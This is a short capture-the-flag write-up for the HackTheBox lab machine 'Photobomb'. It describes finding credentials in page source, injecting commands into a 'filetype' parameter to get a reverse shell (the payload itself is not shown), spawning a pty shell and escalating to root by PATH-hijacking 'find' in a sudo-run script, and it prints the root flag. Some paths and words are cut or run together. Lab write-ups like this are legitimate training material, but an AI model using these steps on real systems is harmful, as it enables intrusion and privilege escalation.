+1 (512) 588 6950

Photobomb — HackTheBox Machine Simple Writeup | 2023

Home/Photobomb — HackTheBox Machi...
Photobomb — HackTheBox Machine Simple Writeup | 2023

Make sure to Connect with the HackTheBox’s VPN before start


  1. Let’s Perform anmap scan,directory and Subdomain Enumeration First

Open ports

22 - ssh
80 - http

2. Let’s Enumerate the HTTP
Make sure to addphotobomb.htb to your hosts using the Below command

3. On Inspecting the Source code we got something Interesting


Seems Like a Username and PasswordpH0t0:b0Mb!

4. Let’s try to log in with the Creds

We are Logged in : )

But It seems Nothing to be Interesting

5. Let’s Intercept the Request through burp

If you test each Parameter with code Execution commands, you’ll get to know that, we can inject commands onfiletype which can be used to get Reverse shell

6. Let’s Start the Netcat server and use the payload

The payload to be Injected on thefiletype parameter is mentioned below

Make sure to add yourIP address and theportused in netcat


7. Send the request with the payload infiletype parameter

8. We got the reverse Connection. Before we start, let’s make Interactive shell using the below command

python3 -c "import pty;pty.spawn('/bin/bash')" 

9. Now Let’s try to exploit the session to escalate root privilege

We can use linpeas to find a way to In

Linpeas is a popular tool used to search for possible paths to escalate privileges on Linux, Unix, and MacOS hosts.

Seems like we can with root permission. So let’s try to view the contents for any possibilities to gain root privilege

cat /opt/
. /opt/.bashrc
cd /home/wizard/photobomb

# clean up log files
if [ -s log/photobomb.log ] && ! [ -L log/photobomb.log ]
/bin/cat log/photobomb.log > log/photobomb.log.old
/usr/bin/truncate -s0 log/photobomb.log

# protect the priceless originals
find source_images -type f -name ‘*.jpg’ -exec chown root:root {} \;


10. Let’s addbash in a file and let’s execute it with root permission

wizard@photobomb:~/photobomb$ echo bash > find
echo bash > find

wizard@photobomb:~/photobomb$ chmod +x find
chmod +x find

wizard@photobomb:~/photobomb$ sudo PATH=$PWD:$PATH /opt/
sudo PATH=$PWD:$PATH /opt/

root@photobomb:/home/wizard/photobomb# cat /root/root.txt
cat /root/root.txt


Flag: 17efb291c8f2de7f3feae82386cb07c4

Leave a Reply